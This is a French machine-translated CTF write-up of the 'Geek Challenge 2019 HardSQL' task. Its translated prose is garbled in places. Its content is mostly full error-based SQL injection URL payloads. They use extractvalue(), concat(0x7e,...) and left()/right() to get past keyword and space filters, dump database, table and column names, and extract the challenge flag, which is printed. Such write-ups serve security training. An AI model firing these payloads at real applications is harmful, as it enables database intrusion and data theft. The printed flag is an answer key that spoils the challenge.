[geek Challenge 2019] hardsql

[Le défi des geeks 2019]HardSQL

Plusieurs méthodes couramment utilisées ont été essayées,Espace trouvé,or,and,union,order byBeaucoup ont été filtrés.

Essayez l'injection d'erreur,Je n'ai pas vérifié Baidu directement pour voir,Ensuite, utilisez extractvalue() Fonction trouvée non filtrée.

# Explosion de la base de données actuelle
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(database())))))%23 # Fiche technique de dynamitage ?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('%geek%')))))%23 
## '~H4rDsq1'

#  Champ d'explosion 
?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('%H4rDsq1%')))))%23 ## '~id,username,password' #  À gauche. 30Valeur du BIT ## extractvalue()  Valeur maximale de retour de la fonction  32 Il faut donc left() Ou right() Fonctions, Couper à gauche ou à droite ,Encore un épissage. ?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(left(password,31))from(H4rDsq1)))))%23
## 'flag{4e949b07-99eb-4fec-ae1b-17'

#  La valeur à droite de la tempête 
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(right(password,15))from(H4rDsq1)))))%23 ## '~b-173bd90bdf56}' # 'Finalflag：flag{
   4e949b07-99eb-4fec-ae1b-173bd90bdf56}'